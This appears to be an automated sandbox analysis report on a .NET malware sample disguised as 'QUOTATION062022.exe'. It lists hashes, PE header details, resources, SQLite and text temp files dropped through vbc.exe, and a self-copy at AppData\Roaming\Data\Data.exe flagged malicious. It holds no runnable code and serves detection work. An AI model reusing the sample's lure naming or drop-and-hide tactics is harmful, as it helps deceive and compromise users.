SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD9D7.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE63D.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE68F.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE93D.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpEA58.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpF0CA.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.685942106278079
Encrypted:	false
SSDEEP:	24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
MD5:	3F6896A097F6B0AE6A2BF3826C813DFC
SHA1:	951214AB37DEA766005DD981B0B3D61F936B035B
SHA-256:	E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
SHA-512:	C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
Malicious:	false
Preview:	PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

C:\Users\user\AppData\Local\Temp\tmpF167.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6969712158039245
Encrypted:	false
SSDEEP:	24:zDLHcjI8IQ6sNUYzo1jfRRMF6zzC3ZzNTWx7M00:zDL4ImUYzebRR66C3Z0JMR
MD5:	31CD00400A977C512B9F1AF51F2A5F90
SHA1:	3A6B9ED88BD73091D5685A51CB4C8870315C4A81
SHA-256:	E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
SHA-512:	0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
Malicious:	false
Preview:	PWCCAWLGRESZQJYMKOMIHTZVFVPFCSAZVTKGMPWIGSDMTLFZQLHJERDPYZCJGFCRLISWNBAMIMDXCWDVGVLWLRBEVYOOPHYWACKPZXSURGSIFWTFUJKLSAQNAJEWDLUIKFHXLUAMUDGRAVFMICAHEZBIIEGWGAVVJHMHSIBGNLEHYVSOKQMYABDYCPEBOGBMYUCIGVRGYYQRAYNYHAIBMHOTRIZLLYBECMXTCFUOVXXHSEMIUWSBDHOZIZZUXFTLKXXNEMXBKLCQDPKVZNOMDYUYJRWCVILZVJDNNBMPTNOFSKRQTILJRXTKDNUIYSQCAOPCQKTXYXPPGZDZOQYLGYFPFIWNBSQZXYABPTNBJQNBZEETJSFXZNHXBRWUHOMCZAGZQJLNPMZFALBBPHBIXZHLBTBJLTUHPUYVUDWDFJANSIIDJVMUYLPZPYGAJWMTOHGILQWHKJDQUWMTSWIBVVZGAHCNWIFZNGNERRKMSIVXWXEXRZZEWYASCIYJYCOOBWRTNZELPWKFVZKZIBGQBLGCTSTNAJSWPHYJCQSYZVFRYFSRAVVXJIOHQCNVEOIMWPEAVCJLBHRUKDHJWPFMXAKTZVQCOUKYCBZFWBREKKHOHZVNMMJZGWIZEYRAIKTHMJRCWVWKNMJNSZHSDRUZSQOJKCTOSNGKOKEAWUIQNIYHWKIIDHKQIJWCSGRRLEVUTENXSNNVDVYDJTIWYNCAZIEBXMIROLIBTLMGEUOCECFFWLENTJSVHFKQHKAPBXQAJJSUOUSFCBQTHCFYZGSVVAUPLQELRWLXRCZSUSFUBCORCWMJPUNHTEEYODSFGJFTDZLLXMQYMIHIZXOYGABIAWYSBWLAJSCKBWGJBVMMJKBKLUHULJIUHQXIXESAUTNVVZNKMIVIOHPPQAWTQSEHTQMIWNPRZRETXZHRGWOTGIEHCCSGIUCKCIFCQPTAJOFCIMYSMCOPGASEEYCNQLXCNRAPQUSQXTWPKPYCQXPE

C:\Users\user\AppData\Local\Temp\tmpF233.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.685942106278079
Encrypted:	false
SSDEEP:	24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
MD5:	3F6896A097F6B0AE6A2BF3826C813DFC
SHA1:	951214AB37DEA766005DD981B0B3D61F936B035B
SHA-256:	E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
SHA-512:	C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
Malicious:	false
Preview:	PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

C:\Users\user\AppData\Local\Temp\tmpF2C1.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\Users\user\AppData\Roaming\Data\Data.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	584704
Entropy (8bit):	6.565335632420808
Encrypted:	false
SSDEEP:	12288:2LL2x6SMWxa1bx7FxfJo1mJxRHHE6mRsc9gC8NLhPtD6IA1:uSMea1bx7FxfJYOW
MD5:	87AF8A3865F441EB06B4EBBEEA330099
SHA1:	592B904653DFA0C2A82447D283A9187C9A2145B1
SHA-256:	83A8D60614FBA531F23E6206D82589E0A197EB4FCB98DF32083651281E7E243D
SHA-512:	037B8FAF59AA9F96B74CFA50ADA7A0714FB83CEF2D9C5FE18281CC06835952C71CE32D11069D03C69CB1DC68FB2755FA90B80244BDC1AD49F51A125F30898072
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 49%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z.b.....................b......n.... ........@.. .......................@......,.....@.....................................O........^................... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc....^.......`..................@..@.reloc....... ......................@..B................P.......H...................6....a...~............................................(.....r.O.p...,.~3...(....&~&...r.O.p(....~&...r.O.p(......,.~6...(....&~&...r.O.p(....~&...r.P.p(......,.~7...(....&~&...r]P.p(....~&...rcP.p(....2~.....(......(.......{....:~.......(......(......ff.#..@;....#..@;....X(n...Zee}......{......{....:~.......(......{....6~......(......{......{......{......{......{......{.....~....(......{......{.....~....(......{......{....*..{....

C:\Users\user\AppData\Roaming\Data\Data.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.565335632420808
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	QUOTATION062022.exe
File size:	584704
MD5:	87af8a3865f441eb06b4ebbeea330099
SHA1:	592b904653dfa0c2a82447d283a9187c9a2145b1
SHA256:	83a8d60614fba531f23e6206d82589e0a197eb4fcb98df32083651281e7e243d
SHA512:	037b8faf59aa9f96b74cfa50ada7a0714fb83cef2d9c5fe18281cc06835952c71ce32d11069d03c69cb1dc68fb2755fa90b80244bdc1ad49f51a125f30898072
SSDEEP:	12288:2LL2x6SMWxa1bx7FxfJo1mJxRHHE6mRsc9gC8NLhPtD6IA1:uSMea1bx7FxfJYOW
TLSH:	DEC4702DBB424A72ED9E913649504B48EF2E0F233645F9C653DB23C6DB6F8562D09CC8
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z..b.....................b......n.... ........@.. .......................@......,.....@................................

File Icon


Icon Hash:	f0f0f2b2e83492d8

Static PE Info

General

Entrypoint:	0x45a66e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x62AFC77A [Mon Jun 20 01:03:54 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5a61c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5c000	0x35e12	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x92000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x58674	0x58800	False	0.4978344588629944	data	6.10125112624541	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x5c000	0x35e12	0x36000	False	0.5434344256365741	data	6.75618393245462	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x92000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
ACDMI	0x5dcc8	0xd	ASCII text, with no line terminators	English	United States
AEDCC	0x5dcd8	0xd	ASCII text, with no line terminators	English	United States
AMBAS	0x5dce8	0xd	ASCII text, with no line terminators	English	United States
BDHNO	0x5dcf8	0xd	ASCII text, with no line terminators	English	United States
BHIDM	0x5dd08	0xd	ASCII text, with no line terminators	English	United States
BKLEF	0x5dd18	0xd	ASCII text, with no line terminators	English	United States
CDOOA	0x5dd28	0xd	ASCII text, with no line terminators	English	United States
CIJFB	0x5dd38	0xd	ASCII text, with no line terminators	English	United States
CRKOM	0x5dd48	0xd	ASCII text, with no line terminators	English	United States
DDMJK	0x5dd58	0xd	ASCII text, with no line terminators	English	United States
DEIKK	0x5dd68	0xd	ASCII text, with no line terminators	English	United States
DFCDI	0x5dd78	0xd	ASCII text, with no line terminators	English	United States
DFMDF	0x5dd88	0xd	ASCII text, with no line terminators	English	United States
DGBAD	0x5dd98	0xd	ASCII text, with no line terminators	English	United States
DJMMC	0x5dda8	0xd	ASCII text, with no line terminators	English	United States
DKOJP	0x5ddb8	0xd	ASCII text, with no line terminators	English	United States
DNIPA	0x5ddc8	0xd	ASCII text, with no line terminators	English	United States
EDHHL	0x5ddd8	0xd	ASCII text, with no line terminators	English	United States
FBCMB	0x5dde8	0xd	ASCII text, with no line terminators	English	United States
FDBHM	0x5ddf8	0xd	ASCII text, with no line terminators	English	United States
FDDMM	0x5de08	0xd	ASCII text, with no line terminators	English	United States
FDJSE	0x5de18	0xd	ASCII text, with no line terminators	English	United States
FEIIA	0x5de28	0xd	ASCII text, with no line terminators	English	United States
FFDDJ	0x5de38	0xd	ASCII text, with no line terminators	English	United States
FFKLN	0x5de48	0xd	ASCII text, with no line terminators	English	United States
FKOIK	0x5de58	0xd	ASCII text, with no line terminators	English	United States
FKSDG	0x5de68	0xd	ASCII text, with no line terminators	English	United States
FOGAI	0x5de78	0xd	ASCII text, with no line terminators	English	United States
FOSMK	0x5de88	0xd	ASCII text, with no line terminators	English	United States
GIMJD	0x5de98	0xd	ASCII text, with no line terminators	English	United States
GRDPK	0x5dea8	0xd	ASCII text, with no line terminators	English	United States
IAIRF	0x5deb8	0xd	ASCII text, with no line terminators	English	United States
IBPKA	0x5dec8	0xd	ASCII text, with no line terminators	English	United States
ICGDG	0x5ded8	0xd	ASCII text, with no line terminators	English	United States
IKKKK	0x5dee8	0xd	ASCII text, with no line terminators	English	United States
IMFAR	0x5def8	0xd	ASCII text, with no line terminators	English	United States
IMPHF	0x5df08	0xd	ASCII text, with no line terminators	English	United States
INKIM	0x5df18	0xd	ASCII text, with no line terminators	English	United States
IOMFJ	0x5df28	0xd	ASCII text, with no line terminators	English	United States
IPDNE	0x5df38	0xd	ASCII text, with no line terminators	English	United States
JAGMD	0x5df48	0xd	ASCII text, with no line terminators	English	United States
JDPKA	0x5df58	0xd	ASCII text, with no line terminators	English	United States
JILMM	0x5df68	0xd	ASCII text, with no line terminators	English	United States
JPASL	0x5df78	0xd	ASCII text, with no line terminators	English	United States
JSHSJ	0x5df88	0xd	ASCII text, with no line terminators	English	United States
KBBRA	0x5df98	0xd	ASCII text, with no line terminators	English	United States
KDHJI	0x5dfa8	0xd	ASCII text, with no line terminators	English	United States
KGCAP	0x5dfb8	0xd	ASCII text, with no line terminators	English	United States
KGNAR	0x5dfc8	0xd	ASCII text, with no line terminators	English	United States
KMDBJ	0x5dfd8	0xd	ASCII text, with no line terminators	English	United States
LRBBS	0x5dfe8	0xd	ASCII text, with no line terminators	English	United States
LSHML	0x5dff8	0xd	ASCII text, with no line terminators	English	United States
LSPMA	0x5e008	0xd	ASCII text, with no line terminators	English	United States
MDEER	0x5e018	0xd	ASCII text, with no line terminators	English	United States
MEBCF	0x5e028	0xd	ASCII text, with no line terminators	English	United States
MFSSM	0x5e038	0xd	ASCII text, with no line terminators	English	United States
MPABM	0x5e048	0xd	ASCII text, with no line terminators	English	United States
MPSSI	0x5e058	0xd	ASCII text, with no line terminators	English	United States
NBSAC	0x5e068	0xd	ASCII text, with no line terminators	English	United States
NDFRC	0x5e078	0xd	ASCII text, with no line terminators	English	United States
OMJAD	0x5e088	0xd	ASCII text, with no line terminators	English	United States
PHGFM	0x5e098	0xd	ASCII text, with no line terminators	English	United States
PIHOR	0x5e0a8	0xd	ASCII text, with no line terminators	English	United States
